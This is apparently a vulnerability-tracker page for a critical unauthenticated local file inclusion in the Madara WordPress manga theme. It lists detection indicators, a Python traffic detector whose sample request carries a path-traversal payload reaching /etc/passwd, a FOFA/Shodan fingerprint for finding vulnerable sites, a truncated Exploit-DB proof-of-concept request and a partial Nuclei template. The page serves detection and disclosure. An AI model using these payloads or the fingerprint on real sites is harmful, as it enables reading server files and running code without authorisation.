CVE-2025-4524
Published: 2025-05-21
Priority: P277 | Severity: critical | CVSS 3.1 base score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit indexed
EPSS: 9.09% (94.7th percentile)
The Madara – Responsive and modern WordPress theme for manga sites theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.2 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpstylish | madara_responsive_and_modern_wordpress_theme_for_manga_sites | <= 2.2.2 | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated POST requests to /wp-admin/admin-ajax.php with action=madara_load_more and a 'template' parameter containing path traversal sequences (e.g., '../' or 'plugins/../').
- Flag requests containing the X-Requested-With: XMLHttpRequest header combined with the madara_load_more action and traversal strings in the template parameter.
- Use FOFA/Shodan fingerprint body='/wp-content/themes/madara/' to identify potentially vulnerable WordPress instances for proactive scanning.
- Inspect HTTP response bodies for the 'root:.*:0:0:' pattern, indicating successful /etc/passwd inclusion via the LFI vulnerability.
- The vulnerability is exploitable by unauthenticated attackers; no session cookie or authentication token is required in the POST request.
- All versions up to and including 2.2.2 of the Madara theme are vulnerable; the fix is present in version 2.2.2.1 and later.
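A small detector that applies the IOCs listed above to captured traffic, added here as an example and not part of the page's sources. It assumes requests are available as raw HTTP text; the host example.invalid and the template values in the sample traffic are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Traversal after URL-decoding: matches '../', '..\' and 'plugins/../' forms from the IOC list.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# A successful /etc/passwd inclusion leaves a root entry in the response body.
PASSWD_RE = re.compile(r"root:.*:0:0:")


def decode_param(value: str) -> str:
    """Decode up to three times so double-encoded traversal (%252e%252e%252f) is caught."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(raw: str) -> list[str]:
    """Return the IOC matches for one raw HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0] != "/wp-admin/admin-ajax.php":
        return []
    headers = {k.strip().lower(): v.strip() for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != "madara_load_more":
        return []
    findings = []
    template = decode_param(params.get("template", ""))
    if TRAVERSAL_RE.search(template):
        findings.append(f"traversal in template parameter: {template!r}")
        if headers.get("x-requested-with", "").lower() == "xmlhttprequest":
            findings.append("X-Requested-With: XMLHttpRequest sent with madara_load_more")
        if "cookie" not in headers and "authorization" not in headers:
            findings.append("request carries no session cookie or auth token (unauthenticated)")
    return findings


def response_shows_passwd(body: str) -> bool:
    """True when a response body contains an /etc/passwd root entry (LFI success indicator)."""
    return PASSWD_RE.search(body) is not None


# Constructed sample traffic (not from the page): one normal load-more call, one traversal attempt.
HEAD = "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.invalid\r\nX-Requested-With: XMLHttpRequest\r\n\r\n"
BENIGN = HEAD + "action=madara_load_more&page=1&template=madara-core/content/content-archive"
SUSPECT = HEAD + "action=madara_load_more&page=1&template=plugins/..%2F..%2F..%2Fetc%2Fpasswd"
```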
No detection rules found.
Exploit-DB: CVE-2025-4524 [CRITICAL] WordPress Madara - Local File Inclusion (indexed 2026-04-06, CVSS 9.8)
```text
# Exploit Title: WordPress Madara Local File Inclusion
# Date: November 1, 2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: WordPress Theme Madara
# Software Link: WordPress Theme Madara
# Tested on: [OS / PHP / WordPress versions used in testing — e.g., Ubuntu 22.04, PHP 8.1, WP 6.4]
# CVE: CVE-2025-4524
#Attack Vector
body="/wp-content/plugins/madara/"
#POC
POST /wp-admin/admin-ajax.php HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490
action=madara_load_more&page=1&template=p
```
Nuclei: CVE-2025-4524 [CRITICAL] WordPress Madara Theme < 2.2.2.1 - Local File Inclusion (CVSS 9.8)
Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server; exploitation requires a crafted request.
Template:
```yaml
id: CVE-2025-4524
info:
  name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access se
```
No writeups or analysis indexed.